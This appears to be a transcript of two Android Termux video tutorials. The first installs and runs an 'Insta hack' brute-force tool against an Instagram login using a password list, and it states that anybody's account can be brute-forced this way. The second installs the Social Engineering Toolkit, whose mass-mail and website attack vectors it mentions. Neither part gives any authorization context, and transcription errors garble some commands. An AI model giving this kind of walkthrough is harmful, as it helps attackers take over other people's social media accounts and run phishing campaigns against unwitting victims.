consecutive guesses as to the large value that desired. PKG upgrade. I am making sure that all the packages have been upgraded, and next installing get packets by typing pkg install get and then pressing enter, and next updating my Python packets. And now I'm going to get the GitHub link to brute force. Here is the Insta hack which is used for brute forcing the Instagram. You can see the terminal screenshot of how to do attacking. So now I'm going to copy the link and paste it in my Termux. Okay, now I'm going to paste it here and press enter. Here it gets downloaded, and next typing ls command. So you can see here the Insta hack folder, and now I'm getting into the folder by typing cd Insta hack and again typing ls command. So here you can see the Insta hack file which is written in the Python programming language. To do brute force attacking, I need some of the password. For that I need to create a txt file. So here you can see already a txt file is present with the file name of pass. Next I'm going to in nano text editor by typing nano pass.txt. Okay, now I'm in the text editor, entering some of the password and next saving them by pressing Ctrl O, enter, and then Ctrl X. So next I'm going to type python instahack.py. Now here it's asking me to enter username. I'm going to enter my username, and next it's showing me that 10 passwords loaded successfully, and it is also asking that Do you want to use proxy? I'm going to type n because I have already created my own password list. And next, it's asking me how many seconds you want to delay between the each brute force attack. Here I'm typing 1. So now it started checking the each and every password with my username. You can see some of them are incorrect. Okay, now here I got the password matched to my username. So that's how you are going to do brute force attack with Instagram. You can brute force anybody's Instagram account by guessing their passwords. So that's all in this video. Thank you. Hi, welcome back to my video. In this video, we're going to see installing of SE Toolkit, that is Social Engineering Toolkit. Before going to installation, I am going to explain you what is Social Engineering Toolkit. Social Engineering Toolkit is an open source penetration testing framework designed for social engineering. Set has a number of customized attack vectors like mass mail attack, website attacking vectors, the installation part. First, you need to copy the link that is given below in the description. I have already ls, and next here you can see the setoolkit.sh file, that is an shell file, and next typing sh setoolkit.sh. It gets downloaded. I'm going to wait for a while. Where all the tools are present in it. And next I'm going to type cd SE Toolkit, then pressing ls, and now we are in the SE Toolkit folder. To run the Social Engineering Toolkit, we should install some of the requirements. So next I'm going to type pip install r requirements.txt. Now all the requirements get installed. It takes some time for installation, and don't worry about this error. Okay, the SE Toolkit has been installed on my Termex. Next I'm going to type ls so that I can see the files once again. Next typing SE Toolkit. Now here you can see the SE Toolkit, and also you can see the options, and also the attack, penetration testing, third-party models, and so on. So this is how you can install the SE Toolkit on the Android Termex. So that's all in this video. Thank you.